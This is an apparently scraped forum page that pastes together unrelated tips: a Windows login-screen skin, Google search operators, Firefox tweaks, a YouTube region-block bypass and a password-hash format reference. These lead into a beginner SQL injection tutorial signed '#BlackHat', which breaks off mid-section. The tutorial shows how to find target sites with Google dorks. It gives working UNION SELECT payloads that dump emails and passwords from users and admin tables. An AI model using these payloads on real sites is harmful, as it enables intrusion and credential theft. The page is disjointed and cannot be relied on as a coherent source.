[TUT]How to get your computer to have an FBI login screen







1) Download LogonStudios (It's Vista version but if you have Windows 7 it works)

Code:
http://www.megaupload.com/?d=I8DIQ2YN

For xp users:
Code:
http://www.stardock.com/products/logonstudio/downloads.asp

2) You can download the FBI file here

Code:
http://www.wincustomize.com/explore/logonstudio_xp/9606/

Or

Code:
http://skins19.wincustomize.com/24/79/2479496/26/9859/preview-26-9859.jpg

Optional 3) The switch user button was annoying me so i downloaded this to remove it (I'm the only one on my computer so i doubt ill miss it)

Code:
http://www.megaupload.com/?d=8N0EGIW4

Start it up, then open it and it'll do the rest

For the users that want their 'switch user' button back download this:
Code:
http://www.megaupload.com/?d=AA5V5SFQ
Just run the file and it will return your button.
Google Calculator:
Google search can be used as a calculator. It can calculate anything from the simplest math to the most complex equation. All you need to do is just enter the math in the search box and hit enter. You can use the following functions:
+ - Add
- - Subtract
* - Multiply
/ - Divide
^ - To the Power Of
sqrt - Square Root of a Number

Dictionary Definitions:
You can define any word by entering “define:” following the word. For example define: ignoble
Google will display a list of dictionary definitions for that word.


Search for a Specific Title:
Suppose you came across a great article which you really liked but unfortunately forgot to bookmark it then you can find it easily with the help of Google provided you know the title of the article. Here’s how you do it:
Let’s say you read an article “Women talk three times as much as men” then you can search for it by typing “intitle: Women talk three times as much as men”


Google Converter:
Using this feature you can convert units like millimeter into inches, kilometers into miles, liters into ml, etc. You can do so by typing ‘25km in miles’ for converting km in to miles, ‘50litres in ml’ for converting litres into ml, and so on.


Google Currency Converter:
Google’s search has an inbuilt currency converter. It allows you to perform any currency conversion. All you need to do is just enter the conversion you’d like done into the Google search box and hit “Enter” or click the Google Search button. For instance: “1 USD in INR”


Weather Updates:
You can easily know the weather condition of a specific place. In order to find out, all you need to do is just enter the place name followed by “weather”. For ex: “london weather”


Search on a Particular File Types:
There are various kinds of files available over the net. Searching for a specific file type isn’t really easy. But using this tip you can easily search for a specific file type.
For instance if you want to search for a guide, let’s say a ‘Guide to Building a Successful IT Career’ in ppt format. You can make use of the “filetype:” function. So in order to search for the PPT version of the guide you can enter in search bar ‘Guide to Building a Successful IT Career filetype:ppt’


Search on a Particular Website:
If you want to search for something from a particular site using Google search then you can do so by using the “site:” feature. Here’s how you do it:
Let’s say you want to search for cloverfield DVD on Amazon, you can do so by typing “cloverfield DVD site:www.amazon.com”


Get the Local Time anywhere:
Wanna know what time is it in London now? You can ask Google by typing “what time is it London” in the search bar. You can also enter “time (location)” without the quotes.


Remove Unwanted Search Results:
Suppose you wanted to search a Harry potter book review but you ended up in getting reviews of the movie rather than the book. Well in this case you can make Google to exclude the movie results from the search. You can do so by adding “-movie” at the end of the term. For instance: “Harry potter Chamber of secrets -movie” This will give search results excluding the movie- The chamber of secrets.


Search for URL's:
You can even search for URLs in Google search.For instance: “Women_talk_three_times_as_much_as_men”. You can also use “.” “-” instead of “_“. The search will bring up results with the URLs containing the above words entered.


Track Flight Status:
You can also track a particular flight status. All you need to do is just enter the airline and flight number into the search box and hit enter. You’ll get the arrival and departure time of the flight right inside Google’s search results.


Search Google Groups by the Subject Line:
You need to be in the google groups search page before attempting this query; otherwise it might not work correctly. Using the “insubject:” function you can search google groups by the subject line. For instance “insubject:windows xp fast shutdown”


Find Related Sites:
Suppose you find an interesting website and you would like to find some other alternative to this site then you can do so by using “related:” function. For instance if you want to search an alternative for google.com you can do so by entering “related:www.google.com”


Find Links to a Specific URL:
You can find the webpages which have a link to a specific URL using the “link:” function. This is really great as it will help you if you own a website, you can easily find out the pages linking to a page in your site. To use it, you need to enter the whole URL after “link:”
For instance “link:http://www.cnn.com”
Well that’s it for now, hope you liked them. If you know more feel free to mention them here.


Whois Lookup Service:
You can also search for information on a particular domain name. Just type in “whois domain.com” and hit enter. You’ll get to see the creation and expiry dates of the domain.
Suggests Words, Phrases and their Results:
This is really helpful if you aren’t able to spell a particular word or you would like to know the results a particular word would contain when searched.




FireFox tricks:

More Screen Space:
Make your icons small. Go to View - Toolbars - Customize and check the “Use small icons” box.
Smart Keywords:
If there’s a search you use a lot (let’s say IMDB.com’s people search), this is an awesome tool that not many people use. Right-click on the search box, select “Add a Keyword for this search”, give the keyword a name and an easy-to-type and easy-to-remember shortcut name (let’s say “actor”) and save it. Now, when you want to do an actor search, go to Firefox’s address bar, type “actor” and the name of the actor and press return. Instant search! You can do this with any search box.
Keyboard Shortcuts:
This is where you become a real Jedi. It just takes a little while to learn these, but once you do, your browsing will be super fast. Here are some of the most common.
Spacebar - Page Down
Shift-Spacebar - Page Up
Ctrl+F - Find
Alt-N - Find Next
Ctrl+D - Bookmark Page
Ctrl+T - New Tab
Ctrl+K - Go to Search Box
Ctrl+L - Go to Address Bar
Ctrl+= - Increase Text Size
Ctrl+- - Decrease Text Size
F5 - Reload
Alt-Home - Go to Home Page
Auto Complete:
This is another keyboard shortcut, but it’s not commonly known and very useful. Go to the address bar (Control-L) and type the name of the site without the “www” or the “.com”. Let’s say “google”. Then press Control-Enter, and it will automatically fill in the “www” and the “.com” and take you there - like magic! For .net addresses, press Shift-Enter, and for .org addresses, press Control-Shift-Enter.
Tab Navigation:
Instead of using the mouse to select different tabs that you have open, use the keyboard. Here are the shortcuts.
Ctrl+Tab - Rotate Forward Among Tabs
Ctrl+Shft+Tab - Rotate to the Previous Tab
Ctrl+1-9 - Choose a number to jump to a specific Tab
Mouse Shortcuts:
Sometimes you’re already using your mouse and it’s easier to use a mouse shortcut than to go back to the keyboard. Master these cool ones.
Middle Click on Link - Opens in new Tab
Shift-Scroll Down - Previous Page
Shift-Scroll Up - Next Page
Ctrl-Scroll Up - Decrease Text Size
Ctrl-Scroll Down - In Text Size
Middle Click on a Tab - Closes Tab
Delete Items from Address Bar History:
Firefox’s ability to automatically show previous URLs you’ve visited, as you type, in the address bar’s drop-down history menu is very cool. But sometimes you just don’t want those URLs to show up (I won’t ask why). Go to the address bar (Ctrl-L), start typing an address, and the drop-down menu will appear with the URLs of pages you’ve visited with those letters in them. Use the down-arrow to go down to an address you want to delete, and press the Delete key to make it disappear.
User Chrome:
If you really want to trick out your Firefox, you’ll want to create a UserChrome.css file and customize your browser. It’s a bit complicated to get into here, but check out this tutorial.
Create a user.js file:
Another way to customize Firefox, creating a user.js file can really speed up your browsing. You’ll need to create a text file named user.js in your profile folder (see this to find out where the profile folder is) and see this example user.js file that you can modify. Created by techlifeweb.com, this example explains some of the things you can do in its comments.

about:config:
The true power user’s tool, about.config isn’t something to mess with if you don’t know what a setting does. You can get to the main configuration screen by putting about:config in the browser’s address bar. See Mozillazine’s about:config tips and screenshots.
Add a Keyword for a Bookmark:
Go to your bookmarks much faster by giving them keywords. Right-click the bookmark and then select Properties. Put a short keyword in the keyword field, save it, and now you can type that keyword in the address bar and it will go to that bookmark.
Speed Up Firefox:
If you have a broadband connection (and most of us do), you can use pipelining to speed up your page loads. This allows Firefox to load multiple things on a page at once, instead of one at a time (by default, it’s optimized for dialup connections). Here’s how.
Type “about:config” into the address bar and hit return. Type “network.http” in the filter field, and change the following settings (double-click on them to change them)
Set “network.http.pipelining” to “true”
Set “network.http.proxy.pipelining” to “true”
Set “network.http.pipelining.maxrequests” to a number like 30. This will allow it to make 30 requests at once.
Also, right-click anywhere and select New-> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0?. This value is the amount of time the browser waits before it acts on information it receives.
Limit RAM Usage:
If Firefox takes up too much memory on your computer, you can limit the amount of RAM it is allowed to us. Again, go to about:config, filter “browser.cache” and select “browser.cache.disk.capacity”. It’s set to 50000, but you can lower it, depending on how much memory you have. Try 15000 if you have between 512MB and 1GB ram.
Reduce RAM Usage further for when Firefox is Minimized:
This setting will move Firefox to your hard drive when you minimize it, taking up much less memory. And there is no noticeable difference in speed when you restore Firefox, so it’s definitely worth a go. Again, go to about:config, right-click anywhere and select New-> Boolean. Name it “config.trim_on_minimize” and set it to TRUE. You have to restart Firefox for these settings to take effect.
Move or Remove the Close Tab button:
Do you accidentally click on the close button of Firefox’s tabs? You can move them or remove them, again through about:config. Edit the preference for “browser.tabs.closeButtons”. Here are the meanings of each value.
0: Display a Close Button on the Active Tab only
1: (Default) Display Close Buttons on all Tabs
1: (Default) Display Close Buttons on all Tabs
3: Display a single Close Button at the end of the Tab Bar (Firefox 1.x Behavior)
Build your own Firefox Search Engine:
Want to power up Firefox's search box? It's easy to create your own search engine, so that you can rifle through any site from right within Firefox. Adding a search engine that has already been written, of course, is easy. Click the down arrow to the left of the search box, select "Manage Search Engines," then click the "Get more search engines" link at the bottom of the screen. From the Web site that appears, click the search engine you want to install, and you're done.
There are plenty of sites that don't have prebuilt search engines, though. No problem: It's easy to build your own search engine. First install the OpenSearchFox add-on. Then, when you're on a search site, right-click the search box and choose the Add OpenSearch plug-in. From the screen that appears (shown below), type in the name that you want to be associated with the search engine, add a description of the search engine and click Next. Then click Finish, and the site will be added as a search engine that you can choose like any other -- by clicking the arrow to the left of the search box and selecting the engine.


Note that as of this writing, OpenSearchFox doesn't work properly with Firefox v. 2.0.0.10 or 2.0.0.11, although it may be fixed as you read this. When you use the add-on in v. 2.0.0.1 or 2.0.0.11, you'll get an error message after you click Finish, although in some instances, even if you get the error message, the search engine will still be added.
Use Keywords to Speed Up your Searching:
Don't want to go to the trouble of adding your search engine -- or you can't get OpenSearchFox to work properly? Here's another way to do an instant search. When you're at a site, right-click on its search box and select "Add a Keyword for this Search." Type in a name for it and an easy-to-remember shortcut (for example, hp for the Huffington Post blog site). Then click OK. Now, to search the site, go to the Address Bar, and type in your shortcut, followed by a search term, such as hp Clinton. You'll search the site, just as if you were there. Note that on occasion, the search won't work properly, but it will on most sites.
Use Keywords to Speed Up Bookmarks:
Visiting your favorite sites using Firefox's bookmarks is far too much of a chore -- do you really want to do all that mousing around? Instead, you can use keywords to instantly jump to any site you've bookmarked. To do it, after you bookmark a site, right-click on the bookmark, select Properties, type in a short keyword (or even just a letter or two) in the keyword field and click OK. Now, to visit the site, type in the keyword in Firefox's address bar, and you'll jump straight to the site.


Put your own Graphic on the Firefox Toolbar:
If you don't like the plain background of Firefox's tool bar, don't worry -- you can put your own graphic there. Type the following into the userChrome.css file and put the graphic that you want to use, background.gif, in the same directory as userChrome.css. The graphic can be any name and any type of image file supported by Firefox.
Here's the code to use:
/* Change the toolbar graphic */
menubar, toolbox, toolbar, .tabbrowser-tabs {
background-image: url("background.gif") !important;
background-color: none !important;
}
The graphic you use will automatically be scaled to fit the Toolbar. For example, if it's small, it will be tiled.
Hack the Stop, Back and Forward Buttons:
Are you a minimalist? Does it annoy you that there's a big fat Stop button on the Firefox tool bar, even when there's nothing to stop? And how about the Forward and Back buttons -- if there's no place to go forward or back, would you like them simply to disappear?
You're in luck, because it's simple to do. Add these lines below to userChrome.css. Note that even after this trick, the buttons will appear when there's a use for them. For example, when a page is loading, the Stop button will appear, so that you can stop loading the page; it just won't appear when a page isn't loading. And the Forward and Back buttons will appear when there's something to go forward or back to.
/* Remove the Stop button when content isn't loading*/
#stop-button[disabled="true"] { display: none; }
/* Remove the Back button when there's nothing to go back to */
#back-button[disabled="true"] { display: none; }
/* Remove the Forward button when there's nothing to go forward to */
#forward-button[disabled="true"] { display: none; }

Before:
Spoiler (Click to View)

After:
Spoiler (Click to View)
Move the Sidebar to the Right:
Firefox has a sidebar for viewing your history or bookmarks. It normally displays on the left-hand side when you choose View-->Sidebar. If you prefer, though, you can have the sidebar instead appear on the right, by typing this code into the userChrome.css file.
/* Place the sidebar on the right edge of the window */
hbox#browser { direction: rtl; }
hbox#browser > vbox { direction: ltr; }


After hacking userChrome.css, you can make the Sidebar appear on the right, instead of on the left.
Change the Search Bar Width:
Don't like the width of the search bar on the upper-right hand corner of Firefox? No problem -- it's easy to change. All you need to do is specify the width you want, in pixels. Use this code in userChrome.css to tell the search bar to be 600 pixels wide, but you can, of course, use whatever size you want.
/* Make the Search box wider
(in this case 600 pixels wide) */
#search-container, #searchbar {
max-width: 600px !important;
width: 600px !important; }

Before:
Spoiler (Click to View)

After:
Spoiler (Click to View)
Remove Menu Items:
Are there menu items (for example, Help) that you never use? If so, you can easily make them disappear. To remove the Help menu, add this to userChrome.css.
/* Remove the Help menu */
menu[label="Help"] {
display: none !important; }
You can remove any of the other menus as well. Use the same syntax as above and substitute its name (File, Edit, View, History, Bookmarks or Tools). So, for example, to remove both the Help and Tools menu, you'd add these lines to userChrome.css.
/* Remove the Help and Tools menus */
menu[label="Tools"], menu[label="Help"] {
display: none !important; }
Internet users face problems accessing Youtube website when different countries decide to try internet censorship and ISPs block access to Youtube You could be staying in countries like the UK and USA and may not be able to watch certain videos on Youtube. The message “This video is not available in your country” comes up. Now this is not because of any censorship or ISPs blocking access to this video but this is because the owner and poster of videos use Youtube filters to limit these videos to one or more countries.



There are many such videos like Armor for sleep – Hold the door is not available outside USA and BBC’s clip Stop calling it a Honeymoon can only be watched in the UK.
Bypass Youtube Region Filtering To Watch Blocked Youtube Videos

Youtube determine your physical location (country) from the IP address of your computer. This trick can bypass this country-specific limitation.

If the URL of Youtube Video is:
Spoiler (Click to View)

Replace /watch?v=part with /v so that your new URL is now:
Spoiler (Click to View)

Thats it! Now you can watch a blocked YouTube video in your Country | Location.

Hash Types

DES(Unix)
Example: IvS7aeT4NzQPM
Used in Linux and other similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters; in our example the salt is the string "Iv"), then there follows the actual hash.
Notes: [1] [2]

Domain Cached Credentials
Example: Admin:b474d48cdfc4974d86ef4d24904cdd91
Used for caching passwords of Windows domain.
Length: 16 bytes.
Algorithm: MD4(MD4(Unicode($pass)).Unicode(strtolower($username)))
Note: [1]

MD5(Unix)
Example: $1$12345678$XM4P3PrKBgKNnTaqG9P0T/
Used in Linux and other similar OS.
Length: 34 characters.
Description: The hash begins with the $1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]

MD5(APR)
Example: $apr1$12345678$auQSX8Mvzt.tdBi4y6Xgj.
Used in Linux and other similar OS.
Length: 37 characters.
Description: The hash begins with the $apr1$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2000 times.
Notes: [1] [2]

MD5(phpBB3)
Example: $H$9123456785DAERgALpsri.D9z3ht120
Used in phpBB 3.x.x.
Length: 34 characters.
Description: The hash begins with the $H$ signature, then there goes one character (most often the number '9'), then there goes the salt (8 random characters; in our example the salt is the string "12345678"), followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 2048 times.
Notes: [1] [2]

MD5(Wordpress)
Example: $P$B123456780BhGFYSlUqGyE6ErKErL01
Used in Wordpress.
Length: 34 characters.
Description: The hash begins with the $P$ signature, then there goes one character (most often the number 'B'), then there goes the salt (8 random characters; in our example the salt is the string "12345678"), followed by the actual hash.
Algorithm: Actually that is a loop calling the MD5 algorithm 8192 times.
Notes: [1] [2]

MySQL
Example: 606717496665bcba
Used in the old versions of MySQL.
Length: 8 bytes.
Description: The hash consists of two DWORDs, each not exceeding the value of 0x7fffffff.

MySQL5
Example: *E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in the new versions of MySQL.
Length: 20 bytes.
Algorithm: SHA-1(SHA-1($pass))
Note: The hashes are to be loaded to the program without the asterisk that stands in the beginning of each hash.

RAdmin v2.x
Example: 5e32cceaafed5cc80866737dfb212d7f
Used in the application Remote Administrator v2.x.
Length: 16 bytes.
Algorithm: The password is padded with zeros to the length of 100 bytes, then that entire string is hashed with the MD5 algorithm.

MD5
Example: c4ca4238a0b923820dcc509a6f75849b
Used in phpBB v2.x, Joomla version below 1.0.13 and many other forums and CMS.
Length: 16 bytes.
Algorithm: Same as the md5() function in PHP.

md5($pass.$salt)
Example: 6f04f0d75f6870858bae14ac0b6d9f73:1234
Used in WB News, Joomla version 1.0.13 and higher.
Length: 16 bytes.
Note: [1]

md5($salt.$pass)
Example: f190ce9ac8445d249747cab7be43f7d5:12
Used in osCommerce, AEF, Gallery and other CMS.
Length: 16 bytes.
Note: [1]

md5(md5($pass))
Example: 28c8edde3d61a0411511d3b1866f0636
Used in e107, DLE, AVE, Diferior, Koobi and other CMS.
Length: 16 bytes.

md5(md5($pass).$salt)
Example: 6011527690eddca23580955c216b1fd2:wQ6
Used in vBulletin, IceBB.
Length: 16 bytes.
Notes: [1] [3] [4]

md5(md5($salt).md5($pass))
Example: 81f87275dd805aa018df8befe09fe9f8:wH6_S
Used in IPB.
Length: 16 bytes.
Notes: [1] [3]

md5(md5($salt).$pass)
Example: 816a14db44578f516cbaef25bd8d8296:1234
Used in MyBB.
Length: 16 bytes.
Note: [1]

md5($salt.$pass.$salt)
Example: a3bc9e11fddf4fef4deea11e33668eab:1234
Used in TBDev.
Length: 16 bytes.
Note: [1]

md5($salt.md5($salt.$pass))
Example: 1d715e52285e5a6b546e442792652c8a:1234
Used in DLP.
Length: 16 bytes.
Note: [1]

SHA-1
Example: 356a192b7913b04c54574d18c28d46e6395428ab
Used in many forums and CMS.
Length: 20 bytes.
Algorithm: Same as the sha1() function in PHP.

sha1(strtolower($username).$pass)
Example: Admin:6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
Used in SMF.
Length: 20 bytes.
Note: [1]

sha1($salt.sha1($salt.sha1($pass)))
Example: cd37bfbf68d198d11d39a67158c0c9cddf34573b:1234
Used in Woltlab BB.
Length: 20 bytes.
Note: [1]

SHA-256(Unix)
Example: $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqiKSNK1rkTk9zYE1v0
Used in Linux and other similar OS.
Length: 55 characters.
Description: The hash begins with the $5$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-256 algorithm 5000 times.
Notes: [1] [2]

SHA-512(Unix)
Example: $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEmFNLlq6Ik9X3reMXY3doKEuxrcDohKUx0Oxf44aeTIxGEjssvtT1aKyZHjs
Used in Linux and other similar OS.
Length: 98 characters.
Description: The hash begins with the $6$ signature, then there goes the salt (up to 8 random characters; in our example the salt is the string "12345678"), then there goes one more $ character, followed by the actual hash.
Algorithm: Actually that is a loop calling the SHA-512 algorithm 5000 times.
Notes: [1] [2]

-------------------------------------------------
Notes:

[1] Since the hashing requires not only a password but also a salt (or a user name), which is unique for each user, the attack speed for such hashes will decline proportionally to their count (for example, attacking 100 hashes will go 100 times slower than attacking one hash).

[2] The hash is to be loaded to the program in full, to the "Hash" column - the program will automatically extract the salt and other required data from it.

[3] The ':' character can be used as salt; however, since it is used by default for separating hash and salt in PasswordsPro, it is recommended that you use a different character for separating fields; e.g., space.

[4] Salt can contain special characters - single or double quotes, as well as backslash, which are preceded (after obtaining dumps from MySQL databases) by an additional backslash, which is to be removed manually. For example, the salt to be loaded to the program would be a'4 instead of a\'4, as well as the salts a"4 instead of a\"4 and a\4 instead of a\\4.
Back to top
View user's profile Send private message Send e-mail Visit poster's website
written this tutorial is to be completely user-friendly to newcomers to help project the

skills of being able to execute SQL injection. The tutorial is set into sections so it's

easy to find what you're looking for. I'll cover pretty much everything I know, so have a

nice read, have fun and most of all be safe!
Please note, words which are enclosed in (brackets) are en abreviation of the correct term

used to describe an action.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Tutorial written by: #BlackHat aka iSQL
Date written: 25/02/2010
Release: Public
Skill Level: Beginner
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Contents
1A: Understanding SQL Injection
1B: Tricks & Tools
1C: Requirements
------
2A: Searching for Targets
2B: Testing Targets for Vulnerabilities
2C: Finding Columns
2D: Finding Vulnerable Columns
------
3A: Obtaining the SQL version
3B: Version 4
- 1. Obtaining Tables & Columns
- 2. Commands
3C: Version 5
- 1. Obtaining Table Names
- 2. Obtaining Column Names from Tables ------------------------------------------------------------------------
1A: Understanding SQL Injection
SQL Injection is one of todays most powerful methods of system penetration, using error

based queries one is able to extract data (tables & columns) from a vulnerable system,

namely the (database).

1B: Tricks & Tips
Beginners tend to believe that using tools created by advanced SQL injection artists are the

best way around things, please believe that they aren't, everything seems nice and easy with

tools such as (BSQLi and SQLi Helper) which they are, but the users posting the download

links for both applications around the world on hacking forums have been known to very

securely encrypt these tools with malicious files or backdoors etc, I've experienced this

first hand when I first started out. Learning everything manually will help you understand

the environment you are attempting to penetrate, whilst experimenting with commands you have

learnt will only help you become more advanced in SQL injection, as for tricks, there are

many articles named (Cheat Sheets) because this is what they are, purposely created for SQL

injectors to use commands which aren't normally spoken of or known about, Samples are

provided to allow the reader to get basic idea of a potential attack.

1C: Requirements:
When I first started SQL injection personally for me it wasn't to hard to get on the ball

and learn quickly, this is because I had previous knowledge of web-scripts, how the internet

works, and the ability to read and understand complicated tutorials. I believe it's a whole

lot easier if you know the basics of a computer system and how the internet works.
To learn you must be able to read and understand the tutorial or article provided and take

on board everything you see. When I was a beginner I found it easier to attack whilst

reading, do everything in stages, don't read the whole tutorial and go off and expect to

inject off the top of your head. ------------------------------------------------------------------------
2A Searching for Targets
Ahh, the beauty of searching for targets is a lot easier than it sounds, the most common

method of searching is (Dorks). Dorks are an input query into a search engine (Google) which

attempt to find websites with the given texxt provided in the dork itself. So navigate to

Google and copy the following into the search box:
inurl:"products.php?prodID="
This search will return websites affiliated with Google with "products.php?prodID=" within

the URL.
You can find a wide range of dorks to use by searching the forum.
I advise you to create your own dorks, be original, but at the same time unique, think of

something to use that not many people would have already searched and tested.
An example of a dork I would make up:
inurl:"/shop/index.php?item_id=" & ".co.uk"
So using your own dorks isn't a bad thing at all, sometimes your dorks wont work, nevermind

even I get it..

------------------------------------------------------------------------
2B: Testing Targets for Vulnerabilities
It's important that this part's done well. I'll explain this as simply as I can.
After opening a URL found in one of your dork results on Google you now need to test the

site if it's vulnerable to SQL injection.

Example:
http://www.site.com/index.php?Client_id=23

To test, just simply add an asterik ' at the end of the URL

Example:
http://www.site.com/index.php?Client_id=23'

How to tell if the sites vulnerable:
- Missing text, images, spaces or scripts from the original page.
- Any kind of typical SQL error (fetch_array) etc.

So if the website you're testing produces any of the above then the site is unfortunately

vulnerable, which is where the fun starts.

------------------------------------------------------------------------
2C: Finding Columns & the Vulnerable Columns
As I noted in the first section of the tutorial I advise you do pretty much everything

manually with SQL injection, so by using the following commands (providing they're followed

correctly) you will begin to see results in no time :D

Example:
http://www.site.com/index.php?Client_id=23'
^^^^^^^^^^^^^^^^^^^^^^^^
IF THE SITE IS VULNERABLE
Refer to the following to checking how many columns there are.
(order+by) the order by function tells the database to order columns by an integer (digit

e.g. 1 or 2), no errors returned means the column is there, if there's an error returned the

column isnt there

wxw.site.com/index.php?Client_id=23+order+by+1 < No Error wxw.site.com/index.php?Client_id=23+order+by+2 < No Error wxw.site.com/index.php?Client_id=23+order+by+3 < No Error wxw.site.com/index.php?Client_id=23+order+by+4 < ERROR From using order+by+ command and incremating the number each time until the page displays an error is the easiest method to find vulnerable columns, so from the examples above when attempting to order the columns by 4 there's an error, and so column 4 doesn't exist, so there's 3 columns. ------------------------------------------------------------------------ 2D: Finding Vulnerable Columns Ok so let's say we were working on the site I used above, which has 3 columns. We now need to find out which of those three coluns are vulnerable. Vulnerable columns allow us to submit commands and queries to the SQL database through the URL. (union+select) Selects all columns provided in the URL and returns the value of the vulnerable column e.g. 2. Example: wxw.site.com/index.php?Client_id=23+union+select+1,2,3 The site should refresh, not with an error but with some content missing and a number is displayed on the page, either 1, 2 or 3 (as we selected the three columns in the above URL to test for column vulnerability). Sometimes the page will return and look completely normal, which isn't a problem. Some sites you are required to null the value you're injecting into. In simpler terms, the =23 you see in the above URL after Client_id must be nulled in order to return with the vulnerable column. So we simply put a hyphen (minus sign) before the 23 like so: -23 So the URL should now look something like this: wxw.site.com/index.php?Client_id=-23+union+select+1,2,3 Now that should work, let's say the page refreshes and displays a 2 on the page, thus 2 being the vulnerable column for us to inject into. ------------------------------------------------------------------------ 3A: Obtaining the SQL Verison Easier said than done, using the information found in the above sections e.g. amount of columns and the vulnerable column. We now use a command (@@version) and in some cases a series of commands to determine what the SQL version is on the current site. Version 4 or version 5. See the example below to view what a URL should look like when the version command has been inserted into the URL replacing the number 2 as 2 is the vulnerable column on the example site. Example: wxw.site.com/index.php?Client_id=-23+union+select+1,@@version,3 What you need to look for is a series of numbers e.g: 5.0.89-community 4.0.45-log If the above failes and the site just returns an error or displays normally then we need to use the convert function in order for the server to understand the command, don't worry though this is usually the only thing you need to convert and it's on a rare occasion where this is the case. So, if the example site returned an error we need to replace @@version with the convert() function: convert(@@version using latin1) So the example site will now look like this: wxw.site.com/index.php?Client_id=-23+union+select+1,convert(@@version using latin1),3 Now if the page still decides to not return the error then the query must be hexxed: unhex(hex(@@version)) So the example site will now look like this: wxw.site.com/index.php?Client_id=-23+union+select+1,unhex(hex(@@version)),3 Depending on which version the SQL server it is, whether it be 4, or 5 the queries for obtaining data from both versions are different, version 4 and 5 tables are explained below ------------------------------------------------------------------------ 3B Version 4 - 1. Obtaining Tables and Columns You will notice that obtaining tables and columns from version 4 MySQL servers is a little more time consuming and confusing at times as we have to guess pretty much everyhing. Because version 5 is more up to date and has information_schema which the database and tables are stored in, MySQL version 4 doesn't. Providing the MySQL version of the website is 4, we must do the following. So, back to the example URL: wxw.site.com/index.php?Client_id=23+union+select+1,@@version,3 We must now go back to the original URL which is: wxw.site.com/index.php?Client_id=23+union+select+1,2,3 This is where the guessing begins, we need to guess table names. How can we tell if the table name I guess exists? The same as where we tested for the amount of columns. If no error is produced then the table guessed exists. Is there is an error then the table guessed doesn't exist, so just try another. So we use the (from) command followed by the table name you are looking to see exists. Example: wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from admin Usual tables most people search for consist of obtaining user data, so again, be creative just like with the dorks, common table names I use: tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins So if we tried the following as an example: wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from admin ^^^ Error wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from user ^^^ Error wxw.site.com/index.php?Client_id=23+union+select+1,2,3 from users ^^^^^ No Error Now which table do you think exists..? :D The table users exists We are now required to guess column names from the existing table. So thinking logically, which labelled columns within this table would represent data? Columns such as: first_name, last_name, email, username, password, pass, user_id ^^^^^^^^^^^^^^^^^^^^^^^^^ Typical columns found in the users table. So we now must think back to which column is vulnerable (in this case 2) and so we'll use the URL and replace 2 with the column name you are attempting to see if exists in the users table. Let's try a few of the typicals listed above: wxw.site.com/index.php?Client_id=23+union+select+1,f_name,3 from users ^^^^ Error wxw.site.com/index.php?Client_id=23+union+select+1,l_name,3 from users ^^^ Error wxw.site.com/index.php?Client_id=23+union+select+1,address1,3 from users ^^^ Error wxw.site.com/index.php?Client_id=23+union+select+1,email,3 from users ^^^^^ No Error From the above we can clearly see that the column email exists within the table users, the page should return displaying data (most probably an email address) or the data you are extracting i.e if you pulled password from users and the column exists the first password within that column will be displayed on screen. 2. Commands From here we will be able to use certain commands to determine the amount of data we pull from the database or which exact record you wish to pull from a column. concat() We will now use the concat() function to extract data from multiple columns if only one column is vulnerable, in this case remembering back the vulnerable column is 2, so we can only query in within this space. Command: concat(columnname1,0x3a,columnname2) 0x3a is the hex value of a semi-colon : so the output data from the query will be displayed like:this Example: wxw.site.com/index.php?Client_id=23+union+select+1,concat(email,0x3a,password),3 from users The above will output the first email and password found in the table. group_concat(): We will now use the group_concat() function to group all data from one column and display them on one page. Same as the above concat() command just grouping all records together and displaying them as one. Example: wxw.site.com/index.php?Client_id=23+union+select+1,group_concat(email,0x3a,pass),3 from users Now the above should return ALL e-mails and passwords listed in the email and passwords column within the users table. limit 0,1 The limit command is somewhat useful if you're looking for a specific data record. Say for instance we wanted to obtain the 250th record for emails in the table users. We would use: limit 250,1 Thus displaying the 250th e-mail within the data. Example: wxw.site.com/index.php?Client_id=23+union+select+1,email,3+from+users+limit+250,1 ------------------------------------------------------------------------ Version 5 - 1. Obtaining Table Names Now after that painstaking version 4 malakey lol, we're onto version 5, the easiest and quickest version of MySQL to hack, so many things are already done for you, so realise the possibilities and be imaginative. Obtaining table names for version 5 MySQL servers is simple, using information_schema.tables < For table extraction So, example of the URL from earlier, but imagine it is now version 5 Example: wxw.site.com/index.php?Client_id=-23+union+select+1,table_name,3+from+information_schema.tab les The above URL will display only the first table name which is listed in the database information_schema. So using group_concat() just like in version 4 works with the same principle. Example: wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3 from information_schema.tables We should now be able to see all the tables listed on one page, sometimes the last tables will be cut off the end because a portion of the page will be covered in table names from information_schema which aren't useful for us so really, I usually prefer to display table names from the primary database rather than information_schema, we can do the following by using the +where+table_schema=database() command: where => A query for selection
table_schema => Schema of tables from a database
database() => In context the primary database, just leave it as it is.

Example:
wxw.site.com/index.php?Client_id=-23+union+select+1,group_concat(table_name),3+from+informat

ion_schema.tables+where+table_schema=database()

Example List of tables:
About, Admin, Affiliates, Access, Customer, Users

Now all tables should be displayed from the primary database, take your pick and get ready

to extract columns.


2. Obtaining Column Names from Table Names

Ok, suggesting from the above we decided to obtain column information from the table Admin.
Using information_schema once again but this time we will be using:
informaiton_schema.columns
instead of
informtion_schema.tables (as we want to extract columns now, not tables)

The thing with obtaining column information is similar to the principle of obtaining columns in version 4, except we dont have to guess, once again just one command lists them all when combines with group_concat()

Command:
Edit the vulnerable column (in this case 2) to:
column_name instead of table_name

And the end of the URL to:
